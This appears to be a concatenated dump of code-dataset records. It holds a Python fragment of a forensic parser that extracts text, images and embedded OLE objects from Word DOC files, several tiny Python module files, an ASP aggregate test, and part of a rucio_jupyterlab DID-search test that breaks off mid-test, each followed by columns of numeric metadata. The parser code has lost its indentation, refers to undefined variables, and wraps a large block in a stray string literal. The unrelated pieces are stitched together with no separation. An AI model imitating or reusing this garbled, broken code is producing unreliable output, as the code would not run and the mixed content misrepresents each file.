uPage = b'\x50\x00\x41\x00\x47\x00\x45\x00'
uDoc = b'\x44\x00\x4F\x00\x43\x00'
uStyleref = b'\x53\x00\x54\x00\x59\x00\x4C\x00\x45\x00\x52\x00\x45\x00\x46\x00'
uTitle = b'\x54\x00\x49\x00\x54\x00\x4C\x00\x45\x00'
uDate = b'\x49\x00\x46\x00\x20\x00\x44\x00\x41\x00\x54\x00\x45\x00'
### Filtering targets: 0x0001 ~ 0x0017(0x000A Line Feed skipped)
uTab = b'\x09\x00' # Horizontal Tab
uSpecial = b'\xF0'
bFullScanA = False
bFullScanU = False # if the size info is invalid, then the entire range will be scanned.
tempPlus = 0
for i in range(0, PcdCount):
aPcd = Clx[ClxIndex:ClxIndex + 8]
fcCompressed = aPcd[2:6]
fcFlag = struct.unpack('<I', fcCompressed[0:4])[0]
if CONST_FCFLAG == (fcFlag & CONST_FCFLAG):
encodingFlag = True # 8-bit ANSI
else:
encodingFlag = False # 16-bit Unicode
fcIndex = fcFlag & CONST_FCINDEXFLAG
k = 0
if encodingFlag == True: # 8-bit ANSI
fcIndex = int(fcIndex / 2)
fcSize = aCPSize[i + 1] - aCPSize[i]
if len(word_document) < fcIndex + fcSize + 1:
if bFullScanA == False and len(word_document) > fcIndex:
fcSize = len(word_document) - fcIndex - 1
bFullScanA = True
else:
ClxIndex += 8
continue
ASCIIText = word_document[fcIndex:fcIndex + fcSize]
UNICODEText = b''
for i in range(0, len(ASCIIText)):
UNICODEText += bytes([ASCIIText[i]])
UNICODEText += b'\x00'
while k < len(UNICODEText):
if (UNICODEText[k: k + 2] == uSection2 or UNICODEText[k: k + 2] == uSection3 or UNICODEText[
k: k + 2] == uSection4 or
UNICODEText[k: k + 2] == uSection5 or UNICODEText[k: k + 2] == uSection7 or UNICODEText[
k: k + 2] == uSection8 or
UNICODEText[k + 1] == uSpecial or UNICODEText[k: k + 2] == uTrash):
k += 2 ### while
continue
if (UNICODEText[k: k + 2] == uNewline or UNICODEText[k: k + 2] == uNewline2 or UNICODEText[
k: k + 2] == uNewline3 or UNICODEText[
k: k + 2] == uNewline4):
string += bytes([UNICODEText[k]])
string += bytes([UNICODEText[k + 1]])
j = k + 2
while j < len(UNICODEText):
if (UNICODEText[j:j + 2] == uSection2 or UNICODEText[
j:j + 2] == uSection3 or UNICODEText[
j:j + 2] == uSection4 or
UNICODEText[j:j + 2] == uSection5 or UNICODEText[
j:j + 2] == uSection7 or UNICODEText[
j:j + 2] == uSection8 or
UNICODEText[j:j + 2] == uBlank or UNICODEText[
j:j + 2] == uBlank2 or UNICODEText[
j:j + 2] == uNewline or
UNICODEText[j:j + 2] == uNewline2 or UNICODEText[
j:j + 2] == uNewline3 or UNICODEText[
j:j + 2] == uNewline4 or
UNICODEText[j:j + 2] == uTab or UNICODEText[j + 1] == uSpecial):
j += 2
continue
else:
k = j
break
if j >= len(UNICODEText):
break
elif (UNICODEText[k:k + 2] == uBlank or UNICODEText[k:k + 2] == uBlank2 or UNICODEText[
k:k + 2] == uTab):
string += bytes([UNICODEText[k]])
string += bytes([UNICODEText[k + 1]])
j = k + 2
while j < len(UNICODEText):
if (UNICODEText[j:j + 2] == uSection2 or UNICODEText[
j:j + 2] == uSection3 or UNICODEText[
j:j + 2] == uSection4 or
UNICODEText[j:j + 2] == uSection5 or UNICODEText[
j:j + 2] == uSection7 or UNICODEText[
j:j + 2] == uSection8 or
UNICODEText[j:j + 2] == uBlank or UNICODEText[
j:j + 2] == uBlank2 or UNICODEText[
j:j + 2] == uTab or
UNICODEText[j + 1] == uSpecial):
j += 2
continue
else:
k = j
break
if (j >= len(UNICODEText)):
break
string += bytes([UNICODEText[k]])
string += bytes([UNICODEText[k + 1]])
k += 2
elif encodingFlag == False: ### 16-bit Unicode
fcSize = 2 * (aCPSize[i + 1] - aCPSize[i])
if (len(
word_document) < fcIndex + fcSize + 1): # Invalid structure - size info is invalid (large) => scan from fcIndex to last
if (bFullScanU == False and len(word_document) > fcIndex):
fcSize = len(word_document) - fcIndex - 1
bFullScanU = True
else:
ClxIndex = ClxIndex + 8
continue
while k < fcSize:
if (word_document[fcIndex + k: fcIndex + k + 2] == uSection2 or word_document[
fcIndex + k: fcIndex + k + 2] == uSection3 or
word_document[fcIndex + k: fcIndex + k + 2] == uSection4 or word_document[
fcIndex + k: fcIndex + k + 2] == uSection5 or
word_document[fcIndex + k: fcIndex + k + 2] == uSection7 or word_document[
fcIndex + k: fcIndex + k + 2] == uSection8 or
word_document[fcIndex + k + 1] == uSpecial or word_document[
fcIndex + k: fcIndex + k + 2] == uTrash):
k += 2
continue
if (word_document[fcIndex + k: fcIndex + k + 2] == uNewline or word_document[
fcIndex + k: fcIndex + k + 2] == uNewline2 or
word_document[fcIndex + k: fcIndex + k + 2] == uNewline3 or word_document[
fcIndex + k: fcIndex + k + 2] == uNewline4):
if (word_document[fcIndex + k] == 0x0d):
string += b'\x0a'
string += bytes([word_document[fcIndex + k + 1]])
else:
string += bytes([word_document[fcIndex + k]])
string += bytes([word_document[fcIndex + k + 1]])
j = k + 2
while j < fcSize:
if (word_document[fcIndex + j: fcIndex + j + 2] == uSection2 or word_document[
fcIndex + j: fcIndex + j + 2] == uSection3 or word_document[
fcIndex + j: fcIndex + j + 2] == uSection4 or
word_document[fcIndex + j: fcIndex + j + 2] == uSection5 or word_document[
fcIndex + j: fcIndex + j + 2] == uSection7 or word_document[
fcIndex + j: fcIndex + j + 2] == uSection8 or
word_document[fcIndex + j: fcIndex + j + 2] == uBlank or word_document[
fcIndex + j: fcIndex + j + 2] == uBlank2 or word_document[
fcIndex + j: fcIndex + j + 2] == uNewline or word_document[
fcIndex + j: fcIndex + j + 2] == uNewline2 or
word_document[fcIndex + j: fcIndex + j + 2] == uNewline3 or word_document[
fcIndex + j: fcIndex + j + 2] == uNewline4 or word_document[
fcIndex + j: fcIndex + j + 2] == uTab or
word_document[
fcIndex + j + 1] == uSpecial):
j += 2
continue
else:
k = j
break
if j >= fcSize:
break
elif word_document[fcIndex + k: fcIndex + k + 2] == uBlank or word_document[
fcIndex + k: fcIndex + k + 2] == uBlank2 or word_document[
fcIndex + k: fcIndex + k + 2] == uTab:
string += bytes([word_document[fcIndex + k]])
string += bytes([word_document[fcIndex + k + 1]])
j = k + 2
while j < fcSize:
if (word_document[fcIndex + j: fcIndex + j + 2] == uSection2 or word_document[
fcIndex + j: fcIndex + j + 2] == uSection3 or word_document[
fcIndex + j: fcIndex + j + 2] == uSection4 or
word_document[fcIndex + j: fcIndex + j + 2] == uSection5 or word_document[
fcIndex + j: fcIndex + j + 2] == uSection7 or word_document[
fcIndex + j: fcIndex + j + 2] == uSection8 or
word_document[fcIndex + j: fcIndex + j + 2] == uBlank or word_document[
fcIndex + j: fcIndex + j + 2] == uBlank2 or word_document[
fcIndex + j: fcIndex + j + 2] == uTab or
word_document[fcIndex + j + 1] == uSpecial):
j += 2
continue
else:
k = j
break
if j >= fcSize:
break
string += bytes([word_document[fcIndex + k]])
string += bytes([word_document[fcIndex + k + 1]])
k += 2
ClxIndex += 8
dictionary = self.__doc_extra_filter__(string, len(string))
filteredText = dictionary['string']
filteredLen = dictionary['length']
# self.compound.content = filteredText.decode("utf-16")
###### DOC 추가
if len(filteredText) != 0:
nPos = filteredLen
usTmp1 = 0
usTmp2 = 0
if nPos >= 4:
usTmp1 = struct.unpack('<H', filteredText[0 + nPos - 4: 0 + nPos - 4 + 2])[0]
usTmp2 = struct.unpack('<H', filteredText[0 + nPos - 2: 0 + nPos - 2 + 2])[0]
if usTmp1 == uNewline:
if usTmp2 != uNewline:
filteredText += b'\x0A\x00\x00\x00'
else:
if usTmp2 == uNewline:
filteredText += b'\x0A\x00\x00\x00'
else:
filteredText += b'\x0A\x00\x0A\x00\x00\x00'
#######
for i in range(0, len(filteredText), 2):
try:
self.compound.content += filteredText[i:i + 2].decode('utf-16')
except UnicodeDecodeError:
continue
"""
##### Image #####
try:
drawing_offset = 0
img_num = 0
while drawing_offset < len(drawing_data):
if drawing_data.find(b'\xA0\x46\x1D\xF0', drawing_offset) > 0:
# extension = ".jpg"
drawing_offset = drawing_data.find(b'\xA0\x46\x1D\xF0', drawing_offset)
# drawing_offset = drawing_data.find(b'\x1D\xF0', drawing_offset)
elif drawing_data.find(b'\x00\x6E\x1E\xF0', drawing_offset) > 0:
# extension = ".png"
drawing_offset = drawing_data.find(b'\x00\x6E\x1E\xF0', drawing_offset)
# drawing_offset = drawing_data.find(b'\x1E\xF0', drawing_offset)
else:
break
embedded_blip_rh_ver_instance = \
struct.unpack('<H', drawing_data[drawing_offset: drawing_offset + 2])[0]
embedded_blip_rh_Type = struct.unpack('<H', drawing_data[drawing_offset + 2: drawing_offset + 4])[0]
embedded_blip_rh_recLen = struct.unpack('<I', drawing_data[drawing_offset + 4: drawing_offset + 8])[
0]
drawing_offset += 0x08
embedded_size = embedded_blip_rh_recLen
embedded_blip_rgbUid1 = drawing_data[drawing_offset: drawing_offset + 0x10]
drawing_offset += 0x10
embedded_size -= 0x10
embedded_blip_rgbUid2 = None
if int(embedded_blip_rh_ver_instance / 0x10) == 0x46B or int(
embedded_blip_rh_ver_instance / 0x10) == 0x6E3:
embedded_blip_rgbUid2 = drawing_data[drawing_offset: drawing_offset + 0x10]
drawing_offset += 0x10
embedded_size -= 0x10
if embedded_blip_rh_Type != 0xF01A and embedded_blip_rh_Type != 0xF01B and embedded_blip_rh_Type != 0xF01C and \
embedded_blip_rh_Type != 0xF01D and embedded_blip_rh_Type != 0xF01E and embedded_blip_rh_Type != 0xF01F and \
embedded_blip_rh_Type != 0xF029:
break
extension = ""
if embedded_blip_rh_Type == 0xF01A:
extension = ".emf"
embedded_blip_metafileheader = drawing_data[drawing_offset: drawing_offset + 0x22]
drawing_offset += 0x22
embedded_size -= 0x22
elif embedded_blip_rh_Type == 0xF01B:
extension = ".wmf"
embedded_blip_metafileheader = drawing_data[drawing_offset: drawing_offset + 0x22]
drawing_offset += 0x22
embedded_size -= 0x22
elif embedded_blip_rh_Type == 0xF01C:
extension = ".pict"
embedded_blip_metafileheader = drawing_data[drawing_offset: drawing_offset + 0x22]
drawing_offset += 0x22
embedded_size -= 0x22
elif embedded_blip_rh_Type == 0xF01D:
extension = ".jpg"
embedded_blip_tag = drawing_data[drawing_offset: drawing_offset + 0x01]
drawing_offset += 0x01
embedded_size -= 0x01
elif embedded_blip_rh_Type == 0xF01E:
extension = ".png"
embedded_blip_tag = drawing_data[drawing_offset: drawing_offset + 0x01]
drawing_offset += 0x01
embedded_size -= 0x01
elif embedded_blip_rh_Type == 0xF01F:
extension = ".dib"
embedded_blip_tag = drawing_data[drawing_offset: drawing_offset + 0x01]
drawing_offset += 0x01
embedded_size -= 0x01
elif embedded_blip_rh_Type == 0xF029:
extension = ".tiff"
embedded_blip_tag = drawing_data[drawing_offset: drawing_offset + 0x01]
drawing_offset += 0x01
embedded_size -= 0x01
if extension == "":
break
embedded_data = drawing_data[drawing_offset: drawing_offset + embedded_size]
drawing_offset += embedded_size
if not (os.path.isdir(self.compound.tmp_path + self.compound.fileName + "_extracted")):
os.makedirs(os.path.join(self.compound.tmp_path + self.compound.fileName + "_extracted"))
self.compound.ole_path.append(
self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(
img_num) + extension)
embedded_fp = open(self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(
img_num) + extension, 'wb')
img_num += 1
embedded_fp.write(embedded_data)
embedded_fp.close()
except Exception:
pass # No Image
### OLE
ole = olefile.OleFileIO(self.compound.filePath)
ole_fp = open(self.compound.filePath, 'rb')
img_num = 0
for i in range(0, len(ole.direntries)):
try:
if ole.direntries[i].name == '\x01Ole10Native': # Multimedia
self.compound.has_ole = True
ole_fp.seek((ole.direntries[i].isectStart + 1) * 0x200)
ole_data = ole_fp.read(ole.direntries[i].size)
ole_data_offset = 6 # Header
ole_data_offset = ole_data.find(b'\x00', ole_data_offset + 1) # Label
data_name = ole_data[6: ole_data_offset].decode('ASCII')
ole_data_offset = ole_data.find(b'\x00', ole_data_offset + 1) # OrgPath
ole_data_offset += 8 # UType
ole_data_offset = ole_data.find(b'\x00', ole_data_offset + 1) # DataPath
ole_data_offset += 1
data_size = struct.unpack('<I', ole_data[ole_data_offset: ole_data_offset + 4])[0]
ole_data_offset += 4
data = ole_data[ole_data_offset: ole_data_offset + data_size]
if not (os.path.isdir(self.compound.tmp_path + self.compound.fileName + "_extracted")):
os.makedirs(os.path.join(self.compound.tmp_path + self.compound.fileName + "_extracted"))
self.compound.ole_path.append(self.compound.tmp_path + self.compound.fileName + "_extracted/" + data_name)
temp = open(self.compound.tmp_path + self.compound.fileName + "_extracted/" + data_name, 'wb')
temp.write(data)
temp.close()
elif ole.direntries[i].name == 'Package': # OOXML 처리
self.compound.has_ole = True
ole_fp.seek((ole.direntries[i].isectStart + 1) * 0x200)
ole_data = ole_fp.read(ole.direntries[i].size)
if ole_data.find(b'\x78\x6C\x2F\x77\x6F\x72\x6B\x62\x6F\x6F\x6B\x2E\x78\x6D\x6C') > 0: # XLSX
extension = ".xlsx"
elif ole_data.find(
b'\x77\x6F\x72\x64\x2F\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x78\x6D\x6C') > 0: # DOCX
extension = ".docx"
elif ole_data.find(
b'\x70\x70\x74\x2F\x70\x72\x65\x73\x65\x6E\x74\x61\x74\x69\x6F\x6E\x2E\x78\x6D\x6C') > 0: # PPTX
extension = ".pptx"
else:
extension = ".zip"
if not (os.path.isdir(self.compound.tmp_path + self.compound.fileName + "_extracted")):
os.makedirs(os.path.join(self.compound.tmp_path + self.compound.fileName + "_extracted"))
self.compound.ole_path.append(
self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(
img_num) + extension)
temp = open(self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(
img_num) + extension, 'wb')
temp.write(ole_data)
temp.close()
img_num += 1
elif ole.direntries[i].name == 'CONTENTS': # PDF
self.compound.has_ole = True
ole_fp.seek((ole.direntries[i].isectStart + 1) * 0x200)
ole_data = ole_fp.read(ole.direntries[i].size)
if not (os.path.isdir(self.compound.tmp_path + self.compound.fileName + "_extracted")):
os.makedirs(os.path.join(self.compound.tmp_path + self.compound.fileName + "_extracted"))
self.compound.ole_path.append(
self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(
img_num) + ".pdf")
temp = open(self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(
img_num) + ".pdf", 'wb')
temp.write(ole_data)
temp.close()
img_num += 1
elif ole.direntries[i].name[0:1] == '_' and len(ole.direntries[i].name) == 11:
self.compound.has_ole = True
word_document = None
table = None
powerpoint_document = None
current_user = None
workbook = None
section_data = ""
for j in range(0, len(ole.direntries[i].kids)):
if ole.direntries[i].kids[j].name == "WordDocument":
ole_fp.seek((ole.direntries[i].kids[j].isectStart + 1) * 0x200)
word_document = ole_fp.read(ole.direntries[i].kids[j].size)
elif ole.direntries[i].kids[j].name == "1Table":
ole_fp.seek((ole.direntries[i].kids[j].isectStart + 1) * 0x200)
table = ole_fp.read(ole.direntries[i].kids[j].size)
elif ole.direntries[i].kids[j].name == "0Table":
ole_fp.seek((ole.direntries[i].kids[j].isectStart + 1) * 0x200)
table = ole_fp.read(ole.direntries[i].kids[j].size)
elif ole.direntries[i].kids[j].name == "PowerPoint Document":
ole_fp.seek((ole.direntries[i].kids[j].isectStart + 1) * 0x200)
powerpoint_document = ole_fp.read(ole.direntries[i].kids[j].size)
elif ole.direntries[i].kids[j].name == "Current User":
idx = ole.root.isectStart
chain = [idx]
while True:
idx = ole.fat[idx]
if idx == 4294967294:
break
chain.append(idx)
out = bytearray(b'')
for idx in chain:
pos = (idx + 1) * 512
ole_fp.seek(pos)
d = ole_fp.read(512)
out += d
current_user = out[64 * (ole.direntries[i].kids[j].isectStart):64 * (
ole.direntries[i].kids[j].isectStart) + ole.direntries[i].kids[j].size]
elif ole.direntries[i].kids[j].name == "Workbook":
ole_fp.seek((ole.direntries[i].kids[j].isectStart + 1) * 0x200)
workbook = ole_fp.read(ole.direntries[i].kids[j].size)
elif ole.direntries[i].kids[j].name == "BodyText":
section_data = ""
for k in range(0, len(ole.direntries[i].kids[j].kids)):
ole_fp.seek((ole.direntries[i].kids[j].kids[k].isectStart + 1) * 0x200)
temp_section_data = ole_fp.read(ole.direntries[i].kids[j].kids[k].size)
if temp_section_data[0:2] == b'\x42\x00':
is_compressed = False
else:
is_compressed = True
msg = self.inflateBodytext(temp_section_data, is_compressed)
if msg is not False:
section_data += msg
# DOC
result = None
if word_document != None and table != None:
result = self.__parse_doc_normal_for_ole__(word_document, table)
if result != None:
if not (os.path.isdir(self.compound.tmp_path + self.compound.fileName + "_extracted")):
os.makedirs(os.path.join(self.compound.tmp_path + self.compound.fileName + "_extracted"))
self.compound.ole_path.append(
self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(
img_num) + ".txt")
temp = open(self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(
img_num) + ".txt", 'w', encoding='utf-16')
temp.write(result)
temp.close()
img_num += 1
# XLS
from carpe_xls import XLS
from carpe_compound import Compound
result = None
if workbook != None:
temp_xls = XLS(Compound(self.compound.filePath))
result = temp_xls.__parse_xls_normal_for_ole__(workbook)
if result != None:
if not (os.path.isdir(self.compound.tmp_path + self.compound.fileName + "_extracted")):
os.makedirs(os.path.join(self.compound.tmp_path + self.compound.fileName + "_extracted"))
self.compound.ole_path.append(
self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(
img_num) + ".txt")
temp = open(self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(
img_num) + ".txt", 'w', encoding='utf-16')
temp.write(result)
temp.close()
img_num += 1
# PPT
from carpe_ppt import PPT
from carpe_compound import Compound
result = None
if powerpoint_document != None and current_user != None:
temp_ppt = PPT(Compound(self.compound.filePath))
result = temp_ppt.__parse_ppt_normal_for_ole__(powerpoint_document, current_user)
if result != None:
if not (os.path.isdir(self.compound.tmp_path + self.compound.fileName + "_extracted")):
os.makedirs(os.path.join(self.compound.tmp_path + self.compound.fileName + "_extracted"))
self.compound.ole_path.append(
self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(
img_num) + ".txt")
temp = open(self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(
img_num) + ".txt", 'w', encoding='utf-16')
temp.write(result)
temp.close()
img_num += 1
# HWP
if section_data != "":
if not (os.path.isdir(self.compound.tmp_path + self.compound.fileName + "_extracted")):
os.makedirs(os.path.join(self.compound.tmp_path + self.compound.fileName + "_extracted"))
self.compound.ole_path.append(
self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(
img_num) + ".txt")
temp = open(self.compound.tmp_path + self.compound.fileName + "_extracted/" + self.compound.fileName + "_" + str(
img_num) + ".txt", 'w', encoding='utf-16')
temp.write(section_data)
temp.close()
img_num += 1
except Exception:
continue
data = len(ole.direntries)
# print(data)
ole_fp.close()"""
| 51.173583
| 227
| 0.420089
| 9,483
| 101,119
| 4.359696
| 0.047981
| 0.056019
| 0.07445
| 0.05181
| 0.919333
| 0.90499
| 0.898145
| 0.89113
| 0.883366
| 0.882229
| 0
| 0.072754
| 0.483747
| 101,119
| 1,975
| 228
| 51.199494
| 0.719212
| 0.03305
| 0
| 0.787856
| 0
| 0.018741
| 0.052811
| 0.033851
| 0
| 0
| 0.007289
| 0
| 0
| 1
| 0.006747
| false
| 0.002999
| 0.007496
| 0
| 0.032984
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f4730abf8bfc42951b3a8d94a4d6afd2a642f972
| 103
|
py
|
Python
|
washing_learning/loggers/__init__.py
|
Lucas-rbnt/washing-learning
|
eb3e8bcc7c58dafc19bfb94779c681c1164524e7
|
[
"MIT"
] | 8
|
2021-04-13T09:12:38.000Z
|
2021-11-02T08:50:29.000Z
|
washing_learning/loggers/__init__.py
|
Lucas-rbnt/washing-learning
|
eb3e8bcc7c58dafc19bfb94779c681c1164524e7
|
[
"MIT"
] | null | null | null |
washing_learning/loggers/__init__.py
|
Lucas-rbnt/washing-learning
|
eb3e8bcc7c58dafc19bfb94779c681c1164524e7
|
[
"MIT"
] | null | null | null |
from washing_learning.loggers.tensorboard import *
from washing_learning.loggers.time_loggers import *
| 34.333333
| 51
| 0.864078
| 13
| 103
| 6.615385
| 0.538462
| 0.255814
| 0.44186
| 0.604651
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07767
| 103
| 2
| 52
| 51.5
| 0.905263
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
f47e41cce7a998e15bb79abbd5228fe5aae85297
| 175
|
py
|
Python
|
tests/parser/aggregates.count.8.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/aggregates.count.8.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/aggregates.count.8.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
input = """
a(1).
a(2).
a(3).
p(1,3).
p(2,4).
:- p(M, N), #count{V : a(V)} > N.
"""
output = """
a(1).
a(2).
a(3).
p(1,3).
p(2,4).
:- p(M, N), #count{V : a(V)} > N.
"""
| 8.333333
| 33
| 0.337143
| 42
| 175
| 1.404762
| 0.285714
| 0.135593
| 0.101695
| 0.135593
| 0.813559
| 0.813559
| 0.813559
| 0.813559
| 0.813559
| 0.813559
| 0
| 0.103704
| 0.228571
| 175
| 20
| 34
| 8.75
| 0.333333
| 0
| 0
| 0.875
| 0
| 0
| 0.822857
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
be427b015891ff35bb7e030ede9766a3eed8d167
| 178
|
py
|
Python
|
adsilib/__main__.py
|
atsiaras/adsilib
|
0408baab937812bb0862f6186ad936806fe670a4
|
[
"MIT"
] | null | null | null |
adsilib/__main__.py
|
atsiaras/adsilib
|
0408baab937812bb0862f6186ad936806fe670a4
|
[
"MIT"
] | null | null | null |
adsilib/__main__.py
|
atsiaras/adsilib
|
0408baab937812bb0862f6186ad936806fe670a4
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
if __name__ == '__main__':
import adsilib
adsilib.run_app()
| 22.25
| 38
| 0.797753
| 22
| 178
| 5.409091
| 0.590909
| 0.252101
| 0.403361
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.157303
| 178
| 7
| 39
| 25.428571
| 0.793333
| 0
| 0
| 0
| 0
| 0
| 0.044944
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0.166667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
be75d6cd1c716da4e1cc50ad6064cc6708de5777
| 271
|
py
|
Python
|
pytorchrl/envs/__init__.py
|
PyTorchRL/pytorchrl
|
055843ab58a06ba1f77da73082be6f23cf453ddd
|
[
"MIT"
] | 20
|
2021-01-12T16:31:34.000Z
|
2022-03-18T00:31:29.000Z
|
pytorchrl/envs/__init__.py
|
PyTorchRL/pytorchrl
|
055843ab58a06ba1f77da73082be6f23cf453ddd
|
[
"MIT"
] | 4
|
2021-01-19T09:29:58.000Z
|
2021-09-29T12:21:08.000Z
|
pytorchrl/envs/__init__.py
|
PyTorchRL/pytorchrl
|
055843ab58a06ba1f77da73082be6f23cf453ddd
|
[
"MIT"
] | 2
|
2021-01-12T16:07:37.000Z
|
2021-02-01T21:09:14.000Z
|
from .atari.atari_env_factory import atari_train_env_factory, atari_test_env_factory
from .mujoco.mujoco_env_factory import mujoco_train_env_factory, mujoco_test_env_factory
from .pybullet.pybullet_env_factory import pybullet_train_env_factory, pybullet_test_env_factory
| 67.75
| 96
| 0.911439
| 42
| 271
| 5.309524
| 0.214286
| 0.403587
| 0.215247
| 0.161435
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.055351
| 271
| 3
| 97
| 90.333333
| 0.871094
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
beb136d7cb0edafe9fdcd576bb1364df17d431ad
| 7,108
|
py
|
Python
|
rucio_jupyterlab/tests/test_handler_did_search.py
|
didithilmy/jupyterlab-extension
|
3268dccda0a282d96b4411d267a851535a900eca
|
[
"Apache-2.0"
] | 3
|
2021-01-22T08:08:37.000Z
|
2022-02-03T09:44:21.000Z
|
rucio_jupyterlab/tests/test_handler_did_search.py
|
didithilmy/jupyterlab-extension
|
3268dccda0a282d96b4411d267a851535a900eca
|
[
"Apache-2.0"
] | 4
|
2021-02-23T16:17:17.000Z
|
2021-05-07T05:54:45.000Z
|
rucio_jupyterlab/tests/test_handler_did_search.py
|
didithilmy/jupyterlab-extension
|
3268dccda0a282d96b4411d267a851535a900eca
|
[
"Apache-2.0"
] | 2
|
2021-01-22T08:08:44.000Z
|
2021-02-24T09:46:24.000Z
|
# Copyright European Organization for Nuclear Research (CERN)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Authors:
# - Muhammad Aditya Hilmy, <mhilmy@hey.com>, 2020
import json
from unittest.mock import call
import pytest
from rucio_jupyterlab.handlers.did_search import DIDSearchHandler, DIDSearchHandlerImpl, WildcardDisallowedException
from rucio_jupyterlab.rucio import RucioAPIFactory
from .mocks.mock_handler import MockHandler
MOCK_ACTIVE_INSTANCE = 'atlas'
def test_search_did__with_wildcard__wildcard_enabled__should_return_correct_response(mocker, rucio):
rucio.instance_config['wildcard_enabled'] = True
mocker.patch.object(rucio, 'search_did', return_value=[
{'scope': 'scope', 'name': 'name1', 'bytes': None, 'did_type': 'CONTAINER'},
{'scope': 'scope', 'name': 'name2', 'bytes': None, 'did_type': 'DATASET'},
{'scope': 'scope', 'name': 'name3', 'bytes': 123, 'did_type': 'FILE'}
])
handler = DIDSearchHandlerImpl(MOCK_ACTIVE_INSTANCE, rucio)
result = handler.search_did('scope', 'name*', 'all', 100)
rucio.search_did.assert_called_once_with('scope', 'name*', 'all', 100)
expected = [
{'did': 'scope:name1', 'size': None, 'type': 'container'},
{'did': 'scope:name2', 'size': None, 'type': 'dataset'},
{'did': 'scope:name3', 'size': 123, 'type': 'file'}
]
assert result == expected, "Invalid return value"
def test_search_did__without_wildcard__wildcard_disabled__should_return_correct_response(mocker, rucio):
rucio.instance_config['wildcard_enabled'] = False
mocker.patch.object(rucio, 'search_did', return_value=[
{'scope': 'scope', 'name': 'name1', 'bytes': None, 'did_type': 'CONTAINER'},
{'scope': 'scope', 'name': 'name2', 'bytes': None, 'did_type': 'DATASET'},
{'scope': 'scope', 'name': 'name3', 'bytes': 123, 'did_type': 'FILE'}
])
handler = DIDSearchHandlerImpl(MOCK_ACTIVE_INSTANCE, rucio)
result = handler.search_did('scope', 'name', 'all', 100)
rucio.search_did.assert_called_once_with('scope', 'name', 'all', 100)
expected = [
{'did': 'scope:name1', 'size': None, 'type': 'container'},
{'did': 'scope:name2', 'size': None, 'type': 'dataset'},
{'did': 'scope:name3', 'size': 123, 'type': 'file'}
]
assert result == expected, "Invalid return value"
def test_search_did__with_wildcard__wildcard_disabled__should_raise_exception(mocker, rucio):
rucio.instance_config['wildcard_enabled'] = False
mocker.patch.object(rucio, 'search_did', return_value=[
{'scope': 'scope', 'name': 'name1', 'bytes': None, 'did_type': 'CONTAINER'},
